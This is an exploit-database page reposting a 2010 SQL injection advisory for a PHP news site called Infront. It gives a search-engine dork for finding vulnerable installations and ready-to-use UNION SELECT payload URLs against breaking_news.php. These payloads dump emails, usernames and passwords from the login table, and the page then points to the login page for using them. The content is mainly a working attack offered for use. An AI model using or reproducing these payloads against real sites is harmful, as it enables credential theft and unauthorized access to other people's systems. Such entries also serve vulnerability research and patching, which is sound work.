[] NeoSense
E X P L O I T S
title author type platform port cve id

Infront - SQL Injection

Author: TheMaStEr
type: webapps
platform: php
port: 
date_added: 2010-06-11 
date_updated:  
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
# Exploit Title: Infront SQL Injection Vulnerability
# Date: 12-06-2010
# Author: TheMaster <v4m@hotmail.de>
# Software Link: http://www.infront.com/
# Version: N/A
# Tested on: Windows XP SP3

Author : TheMaster <v4m@hotmail.de>
Dork : intext:Powered by Infront
Type of attack : SQLi
File : breaking_news.php
Exploit Code : http://target/path/breaking_news.php?newsid=union select 1,2,3,concat(email,0x3e,user,0x3e,pass),5,6+FROM+login

After , you can login here : http://target/path/login.php

demo : http://server/breaking_news.php?newsid=-103+UNION+SELECT+1,2,3,concat(email,0x3e,user,0x3e,pass),5,6+FROM+login--

GreeTz : SA H4x0r <Abu Saud> , HiV Sec Team , Sec4ever and v4-Team Members
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.